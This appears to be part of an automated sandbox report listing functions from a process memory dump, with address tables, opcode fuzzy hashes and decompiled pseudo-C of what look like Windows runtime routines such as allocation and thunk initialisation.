                                                0x0161e789
                                                0x0161e7a8
                                                0x0161e7ac
                                                0x0161e807
                                                0x0161e7ae
                                                0x0161e7ae
                                                0x0161e7b1
                                                0x0161e7b4
                                                0x0161e7b9
                                                0x0161e7c0
                                                0x0161e7c4
                                                0x0161e7ca
                                                0x0161e7cc
                                                0x00000000
                                                0x0161e7d3
                                                0x0161e7d6
                                                0x00000000
                                                0x00000000
                                                0x0161e7ff
                                                0x0161e802
                                                0x00000000
                                                0x00000000
                                                0x0161e7f9
                                                0x0161e7fc
                                                0x00000000
                                                0x00000000
                                                0x0161e7f3
                                                0x0161e7f6
                                                0x00000000
                                                0x00000000
                                                0x0161e7ed
                                                0x0161e7f0
                                                0x00000000
                                                0x00000000
                                                0x0161e7e7
                                                0x0161e7ea
                                                0x00000000
                                                0x00000000
                                                0x0165b685
                                                0x0165b688
                                                0x00000000
                                                0x00000000
                                                0x0165b682
                                                0x00000000
                                                0x00000000
                                                0x0161e7cc
                                                0x0161e7d9
                                                0x0161e7dc
                                                0x0161e7de
                                                0x0161e7de
                                                0x0161e7ac
                                                0x0161e7e4
                                                0x0161e74b
                                                0x0161e751
                                                0x0161e759
                                                0x0161e761
                                                0x0161e761

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f594b9cbf55afa16537e2be5cbbfb7af893dd3502eb9a1fd73fe2c148cf2e587
                                                • Instruction ID: 5686cca2295e0bfec14b57d081a5e6bcd167bcf32ca56d1224d08a542404a5e0
                                                • Opcode Fuzzy Hash: f594b9cbf55afa16537e2be5cbbfb7af893dd3502eb9a1fd73fe2c148cf2e587
                                                • Instruction Fuzzy Hash: 2A318C75A14249AFE745CF58CC41B9ABBE4FB08314F18825AFE04CB341D632EC90CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0161BC2C, Relevance: .1, Instructions: 88COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 67%
                                                			E0161BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x16d6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01602280(0xd, 0x722f1a0);
				_t41 =  *0x16d60f8; // 0x0
				if(_t41 != 0) {
					 *0x16d60f8 =  *_t41;
					 *0x16d60fc =  *0x16d60fc + 0xffff;
				}
				E015FFFB0(_t41, 0x800, 0x722f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x16d60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01604620(0x16d6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x16d6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                0x0161bc36
                                                0x0161bc42
                                                0x0161bc45
                                                0x0161bc4a
                                                0x0161bd35
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0161bc50
                                                0x0161bc50
                                                0x0161bc58
                                                0x0161bc5a
                                                0x0161bc60
                                                0x00000000
                                                0x00000000
                                                0x0165a4f2
                                                0x0165a4f6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0165a4fc
                                                0x0161bc79
                                                0x0161bc7e
                                                0x0161bc86
                                                0x0161bd16
                                                0x0161bd20
                                                0x0161bd20
                                                0x0161bc8d
                                                0x0161bc94
                                                0x0161bcbd
                                                0x0161bcca
                                                0x0161bccb
                                                0x0161bccc
                                                0x0161bccd
                                                0x0161bcce
                                                0x0161bcd4
                                                0x0161bcea
                                                0x0161bcee
                                                0x0161bcf2
                                                0x0161bd00
                                                0x0161bd04
                                                0x00000000
                                                0x0161bc96
                                                0x0161bcab
                                                0x0161bcaf
                                                0x0161bd2c
                                                0x0161bd2c
                                                0x0161bd09
                                                0x00000000
                                                0x0161bd09
                                                0x0161bcb1
                                                0x0161bcb5
                                                0x0161bcbb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0161bcbb

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7d3d47d2b6c02cae87a9699c118ce2f9de51b582359331be84e9610f41f2eff
                                                • Instruction ID: 6e0f25f098ad569b491dcc835e25f755c3958317665bc9866e503967b18ec815
                                                • Opcode Fuzzy Hash: f7d3d47d2b6c02cae87a9699c118ce2f9de51b582359331be84e9610f41f2eff
                                                • Instruction Fuzzy Hash: DD31DD72A016169BCB22DFA8DC807A677B4FB18311F484079EE44DB30AEB74D916CB84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015E9100, Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fdb442cc8afed809191388fca00d8d3c3c277b18e0daeffffdfdb35cb0593d64
                                                • Instruction ID: bd4848b7d24b8dc66b8fc26d11a8f39dd9761f5ff78b0d82e971bb669ed90e51
                                                • Opcode Fuzzy Hash: fdb442cc8afed809191388fca00d8d3c3c277b18e0daeffffdfdb35cb0593d64
                                                • Instruction Fuzzy Hash: 69317C71E012969FDB2ADB68C88C7ADBBF6BB88358F18814DC5046B241C330E980CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01611DB5, Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 60%
                                                			E01611DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0160F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01604620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0160F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                0x01611dc2
                                                0x01611dc5
                                                0x01611dc7
                                                0x01611dcc
                                                0x01611dce
                                                0x01611dd6
                                                0x01611ddf
                                                0x01611de0
                                                0x01611de1
                                                0x01611de5
                                                0x01611de8
                                                0x01611def
                                                0x01611df0
                                                0x01611df6
                                                0x01611df7
                                                0x01611dfe
                                                0x01611e1a
                                                0x00000000
                                                0x00000000
                                                0x01611e0b
                                                0x01611e12
                                                0x01611e12
                                                0x01611e00
                                                0x01611e00
                                                0x01611e05
                                                0x01611e1e
                                                0x01611e23
                                                0x0165570f
                                                0x01655713
                                                0x00000000
                                                0x00000000
                                                0x01655719
                                                0x01655719
                                                0x01611e2c
                                                0x01611e2d
                                                0x01611e2e
                                                0x01611e2f
                                                0x01611e31
                                                0x01611e32
                                                0x01611e35
                                                0x01611e3d
                                                0x01655723
                                                0x0165573d
                                                0x0165573d
                                                0x00000000
                                                0x01655723
                                                0x01611e49
                                                0x01611e4e
                                                0x01611e4e
                                                0x01611e09
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                • Instruction ID: 98bbb61fa12d1061a5bf78b78a3b0ad70a4945e3b71ea45f20af2d175b091cae
                                                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                • Instruction Fuzzy Hash: 2E218172600119EFD725CFA9CC80EABBBBDEF86680F194155EA05D7250DB34AE01C7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01600050, Relevance: .1, Instructions: 81COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d3d03d1350dff2aa7dd0fce3f2e1776573d717f115218ca826c483f7582bd12b
                                                • Instruction ID: 4b55525b20646d93c6728a18b66a68b29d05d64d7a14ff3ddef006f474c16a75
                                                • Opcode Fuzzy Hash: d3d03d1350dff2aa7dd0fce3f2e1776573d717f115218ca826c483f7582bd12b
                                                • Instruction Fuzzy Hash: 36318E31601B058FD726CB28CC40B9BB7E5FF89754F14456DE59687B90DB75A801CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01666C0A, Relevance: .1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f22cd1148505f6f4201401cb4ff99c4fce2ec3864b6a97967ea684be0f76ec3a
                                                • Instruction ID: ee2f65b0a29459e85d21a18925829cf2c6c9a1dc0abdc0d58712407f1233692a
                                                • Opcode Fuzzy Hash: f22cd1148505f6f4201401cb4ff99c4fce2ec3864b6a97967ea684be0f76ec3a
                                                • Instruction Fuzzy Hash: 32219A72A00A55ABD716DB68EC80E2AB7B8FF48740F040069F904D7791D734ED10CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016290AF, Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                • Instruction ID: 41aea89733323f9e2b6603de097475f18eede1c5259d475b538f82fc00a839fa
                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                • Instruction Fuzzy Hash: A8217F71A00625EFDB21DF69CC44AAAFBF8EB94354F14886EE945A7240D730ED00CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01613B7A, Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6fa0060f3f2696d625ee791f637e02c8c35c645019c4c70eb6cd0f07c09bddb4
                                                • Instruction ID: 310d680496912dd3e58300f34284f41d61fa0c4b2cfc5391a6488ce3efb44eb5
                                                • Opcode Fuzzy Hash: 6fa0060f3f2696d625ee791f637e02c8c35c645019c4c70eb6cd0f07c09bddb4
                                                • Instruction Fuzzy Hash: B3210172A01109EFC710DF98CD81F6ABBBDFB40318F1900A8EA09AB252D371ED15CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01666CF0, Relevance: .1, Instructions: 74COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a36e9444f79d3887dc5acf25514aaec6ee4ace7e00a41387ca4df00b8698798
                                                • Instruction ID: 3659e4fdae903f005f5665665e458dd287dc8d112242958d018705db08632159
                                                • Opcode Fuzzy Hash: 4a36e9444f79d3887dc5acf25514aaec6ee4ace7e00a41387ca4df00b8698798
                                                • Instruction Fuzzy Hash: D521F2735002459BD312DF69DD44B6BBBECEFA1680F08095AFA40C7291E734D949C6A6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016B070D, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                • Instruction ID: afc4244ef05d3a5832ef5e6a27a0a9a72a44156b29cd6b3b3c8506ddd365a2d7
                                                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                • Instruction Fuzzy Hash: 87212F76204200AFD705DF2CCC80AABBBA6EFD0350F04862DF9948B381CB30D949CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01667794, Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 26073ad4164b9e65cc6d60f2d6dba7fef7b8c0c3a1360bb9ffbfb90290f63c9d
                                                • Instruction ID: e122a1e8a660a6dc7f45b45ba1144df3c2258927e39b8810f633daba64dc62e0
                                                • Opcode Fuzzy Hash: 26073ad4164b9e65cc6d60f2d6dba7fef7b8c0c3a1360bb9ffbfb90290f63c9d
                                                • Instruction Fuzzy Hash: B8216F72900654ABC725DF69DC90EABBBADEF48740F10456DEA0AD7790D734ED00CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0160AE73, Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                • Instruction ID: d7185768ed7492d950e09b9c360d5f08899f4dc13ed354a9f2bf6dd9c1b0ee1c
                                                • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                • Instruction Fuzzy Hash: 3021C232601681DFE71B9B68CD54B277BE9EF44780F1900A8EE048B7D2D734DC41C6A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0161FD9B, Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                • Instruction ID: 2a10e233c06be08f832fad3e9b5e00351138af2c1473656c8812e34e2af53860
                                                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                • Instruction Fuzzy Hash: 80217C72A40A41DBD735CF4DC940A66F7E5EB94A10F2881AEE94587719D731AC06CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0161B390, Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd317fe1ea7b28c203ad03341c51570a6a5e5d8d03914440051281560d2ad168
                                                • Instruction ID: d5edf7b526746f41b8f271becd837a4ca945303a964106cbbcc05d313b7a0d9f
                                                • Opcode Fuzzy Hash: fd317fe1ea7b28c203ad03341c51570a6a5e5d8d03914440051281560d2ad168
                                                • Instruction Fuzzy Hash: F9116B337011209BCB199E5A9D81A2B736BEBC5730F28412DDD16C7380DA31AC02C694
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015E9240, Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7b74b2a54d112f555f202086ee2183dc16def15514df4759900440890e4dba74
                                                • Instruction ID: a551f90945e20e6f113984b9fda271955d31f3c28de4d8bada036ba294b8154f
                                                • Opcode Fuzzy Hash: 7b74b2a54d112f555f202086ee2183dc16def15514df4759900440890e4dba74
                                                • Instruction Fuzzy Hash: 88214A71541602DFC726EF68CE44F1AB7FABF18708F04456CE0499B6A2C734E951CB48
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01674257, Relevance: .1, Instructions: 60COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 655a0a5cc52aa5c71b00a3d47b113804fd6a72d658cb132a26543880b7812bf1
                                                • Instruction ID: 28a88304ca34b3309ec39c706e723c8130a6576180e0e98777a2674706454692
                                                • Opcode Fuzzy Hash: 655a0a5cc52aa5c71b00a3d47b113804fd6a72d658cb132a26543880b7812bf1
                                                • Instruction Fuzzy Hash: F5213870A02602CFC726EF69DC08AA8BBE5FF85315B61D26EC129CB665DB319461CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01612397, Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0313cf9ebc5a6c0090a0d03be7802b4ab18fcc3f434ee096efc6f6fc3f23d004
                                                • Instruction ID: d2ee127ee2b4426ca450d34bee45576bff53490ed1c29ac498761672fcf7c661
                                                • Opcode Fuzzy Hash: 0313cf9ebc5a6c0090a0d03be7802b4ab18fcc3f434ee096efc6f6fc3f23d004
                                                • Instruction Fuzzy Hash: BD114E31700351ABE3319A6E9C94F16B7DDFB60B60F2C441EFA03EB285DAB0E8418758
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016646A7, Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                • Instruction ID: 7324efe44a603ecec14d9a1f52f5636151d667785f2fb10bc24d77ba4b9d2c8a
                                                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                • Instruction Fuzzy Hash: D411E572504608BBC7169F5CDC808BEBBB9EF95310F1080AEF984C7351DA359D55D7A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015EC962, Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e93ec51b5271aeb636c97e165dec37008d7b7c36219c79a95cd007344dc6e66
                                                • Instruction ID: a4337f02881bbbcbfc9c8b02d13dd4d69ddf2058b7321387ff3265ead7bbf5d8
                                                • Opcode Fuzzy Hash: 2e93ec51b5271aeb636c97e165dec37008d7b7c36219c79a95cd007344dc6e66
                                                • Instruction Fuzzy Hash: 0711CE31B006079FC761AE2DDC95A2BB7E6FB84615F80052CED4287691DB20EC10C7D2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016237F5, Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5fc675ff04ba6a98d59f154dc0b12fb36128a0cb0ca16aa6b5015afbb5747628
                                                • Instruction ID: 8b0152e8a777a310c9111fe6c1085562f86ded992332bd29c78dd5e5b3a8d3c7
                                                • Opcode Fuzzy Hash: 5fc675ff04ba6a98d59f154dc0b12fb36128a0cb0ca16aa6b5015afbb5747628
                                                • Instruction Fuzzy Hash: 69018472A42A229BC3378A5D9D40A26BBA6FF89A50717406DE9458F315D77CD801CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0161002D, Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                • Instruction ID: ba67d79e0d97d44de84a09fd8febdb4ba05ffddf0b0c2139678a4afd1b580abc
                                                • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                • Instruction Fuzzy Hash: E9118E726056818FEB639728DD44B267B95EF41755F0D00E4ED44877D2EB28D8C2C264
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015F766D, Relevance: .1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                • Instruction ID: 3075bd20e73223c7fc49d878886f221583c3dca35abae6fcdff7b82047716fe2
                                                • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                • Instruction Fuzzy Hash: 58018832710129ABD7209E5ECD41E5B7BADFB88660B18056CBB08CF258DA30DD0187A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0167C450, Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                • Instruction ID: b3287f987d43e28aec5c13c23f472b068c24aa8da8d3844dbe6814d619b61472
                                                • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                • Instruction Fuzzy Hash: D3019671240916BFE715AF69CC80E62FB6EFF94394F004529F25452660C721ACA0CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015E9080, Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9ed21117b1210051cc7d17ee6e512ff1f414b25449cdc39195286b59f59a0e03
                                                • Instruction ID: 70561ed520db60acdf0ac8c697edbbc56711d66388248f2f9cadf5a8e4bf9e2e
                                                • Opcode Fuzzy Hash: 9ed21117b1210051cc7d17ee6e512ff1f414b25449cdc39195286b59f59a0e03
                                                • Instruction Fuzzy Hash: 4001AD72D022019FC32A8F08DC44B167FF9FB81324F22402AE201CFA91D6709C41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016B4015, Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0a1e2f20a94e752e6f4a59a8257d010625a9d30c0131e640e9b251c59eb8fc74
                                                • Instruction ID: 06dac7c86e4f1d06c49987d67d89976ba5534fd873482a9dd6937013df42085f
                                                • Opcode Fuzzy Hash: 0a1e2f20a94e752e6f4a59a8257d010625a9d30c0131e640e9b251c59eb8fc74
                                                • Instruction Fuzzy Hash: E001A2726419477FD216AF79CD84E63B7ADFF95660B00022EF60887A52CB24EC51C7E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016A14FB, Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68bce2641386f053a557ef5f41040eef9d10014888e13031efec66f0c2b96442
                                                • Instruction ID: 8b407818c51d8fd81af888c5f65d8562b624177805d22c37968f2fa2fa922e81
                                                • Opcode Fuzzy Hash: 68bce2641386f053a557ef5f41040eef9d10014888e13031efec66f0c2b96442
                                                • Instruction Fuzzy Hash: C8019271A01259AFCB14DFA8DC42EAEBBB8EF45710F40406AF944EB380DA70DE00CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016A138A, Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9de380b03a8cbeb8a84cf83797239d34870d07295a675883a880d77e552f245
                                                • Instruction ID: c5751f9c186d315cee89e86a80787828d51865a5e19578874f44864d8ee7f399
                                                • Opcode Fuzzy Hash: a9de380b03a8cbeb8a84cf83797239d34870d07295a675883a880d77e552f245
                                                • Instruction Fuzzy Hash: 00015271A01619AFDB14DFA9DC42EAEBBB8EF45710F40406AF904EB380DA749E01CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015E58EC, Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3847934f1d7845250d9d46c8f45287642c94422aa36da4e553d0be86a54c8ba5
                                                • Instruction ID: 1578b546a6f9c7b4ac9168403bf3cb41ab0f46109561521b71fbf67853cc495c
                                                • Opcode Fuzzy Hash: 3847934f1d7845250d9d46c8f45287642c94422aa36da4e553d0be86a54c8ba5
                                                • Instruction Fuzzy Hash: F201DF35E101099BD728EE68DC04AAE77FDFB82524F850069AA05DB644EF20ED02C694
                                                Uniqueness

